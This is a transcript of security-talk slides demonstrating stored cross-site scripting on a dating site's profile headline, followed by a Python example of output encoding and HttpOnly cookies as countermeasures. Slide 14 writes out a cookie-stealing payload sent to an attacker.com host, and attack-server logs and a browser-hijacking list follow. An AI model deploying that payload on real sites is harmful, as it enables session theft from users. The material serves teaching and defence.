  • Welcome to “Hacking Exposed: Web Application Attacks and Countermeasures” presented by Caleb Sima and Joel Scambray, co-authors of Hacking Exposed Web Applications, 2nd Edition.

Transcript

  • 1. Cross-site Scripting Attacks Caleb Sima S.P.I Dynamics
  • 2. Simple XSS Checking
  • 3. Fill in the forms
  • 4. User input is reflected back
  • 5. Let’s try some JavaScript
  • 6. Bingo!
  • 7. XSS on a large scale
    • Create a simple profile
    • Which text is seen by the most people?
  • 8. Let’s run a test
    • Plain vanilla XSS entry in the headline
  • 9. Let’s view the profile and see what happens
  • 10. Success!
  • 11. Does it execute in a displayed list of results?
  • 12. Yes it does.
  • 13. Create an external JS file (attack flow between the Dating Website and the Attack Server)
    • 1. Attacker creates exploit profile
    • 2. Victim executes date search
    • 3. Headline is viewed. Exploited
    • 4. Victim requests attack payload
    • 5. Payload delivered.
    • 6. Victim sends cookie to attacker
  • 14. Create the exploit payload: document.write("<img src= http://attacker.com/ " + document.cookie + " width=0 >")
  • 15. Let’s execute the attack
    • Embed the script to download from the attacker's server.
  • 16. View the profile
    • Success. Invisible execution
  • 17. Execute the attack via search
    • Everything looks normal
  • 18. Check out the attack logs
    • 2006-08-31 19:54:47 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 200 0 0
    • 2006-08-31 19:54:47 0.0.0.0 GET /pIDCode=2AD4A95012D09660 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 404 0 2
    • 2006-08-31 19:55:48 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 200 0 0
    • 2006-08-31 19:55:48 0.0.0.0 GET /pIDCode=2AD4A95012D01871 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
    • 2006-08-31 19:56:33 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 304 0 0
    • 2006-08-31 19:56:33 0.0.0.0 GET /pIDCode=2AD4A95012D04309 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
  • 19. Real Exploitation
    • Browser Zombies
    • Control any victim browser
    • Capture keystrokes
    • Capture browsing activity
    • Force the user to view sites of your choosing
  • 20. Try WebInspect SPI Dynamics, Inc. 115 Perimeter Center Place Suite 1100 Atlanta, GA 30346 Caleb Sima [email_address]
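The countermeasure side of slides 9 through 14, as an added example that is not part of the presentation: the profile headline is stored once but rendered in several places (the profile page, the search results list), and each output context needs its own encoder; an HttpOnly session cookie additionally keeps the slide-14 payload's document.cookie read from yielding the session id. The profile data, the attacker.example host and the function names are constructed for illustration.

```python
import html
import re
from urllib.parse import quote

# Constructed sample profiles (not from the slides): one benign, one carrying the
# kind of headline the demo submits on slide 8 (a script tag fetching an external a.js).
PROFILES = [
    {"name": "Alex", "headline": 'Loves hiking & "good" coffee'},
    {"name": "Mallory", "headline": '<script src="http://attacker.example/a.js"></script>'},
]

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_headline_vulnerable(headline: str) -> str:
    """Inserts the stored headline verbatim: the bug the profile page on slide 9 has."""
    return f"<h2 class='headline'>{headline}</h2>"


def render_headline_fixed(headline: str) -> str:
    """HTML-encodes the headline for an element-body context before insertion."""
    return f"<h2 class='headline'>{html.escape(headline, quote=True)}</h2>"


def render_search_results_fixed(profiles) -> str:
    """Slides 11-12: the same stored field also lands in the results list. Each output
    context gets its own encoder: URL query component, quoted attribute, element body."""
    items = []
    for p in profiles:
        name_html = html.escape(p["name"], quote=True)
        headline_html = html.escape(p["headline"], quote=True)
        # quote(safe="") percent-encodes '&' and '"' too, so the href needs no further escaping
        href = "/profile?name=" + quote(p["name"], safe="")
        items.append(f'<li><a href="{href}" title="{headline_html}">{name_html}</a>: {headline_html}</li>')
    return "<ul>" + "".join(items) + "</ul>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie with HttpOnly so a document.cookie read (slide 14) cannot see the session
    id even if another injection slips through; Secure keeps it off plaintext HTTP."""
    return f"Set-Cookie: session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def contains_live_script_tag(markup: str) -> bool:
    """Does an un-encoded <script> tag survive in the rendered output?"""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    bad = PROFILES[1]["headline"]
    print("vulnerable:", contains_live_script_tag(render_headline_vulnerable(bad)))  # True
    print("fixed:", contains_live_script_tag(render_headline_fixed(bad)))            # False
    print(render_search_results_fixed(PROFILES))
    print(session_cookie_header("EXAMPLE-SESSION-ID"))  # placeholder value
```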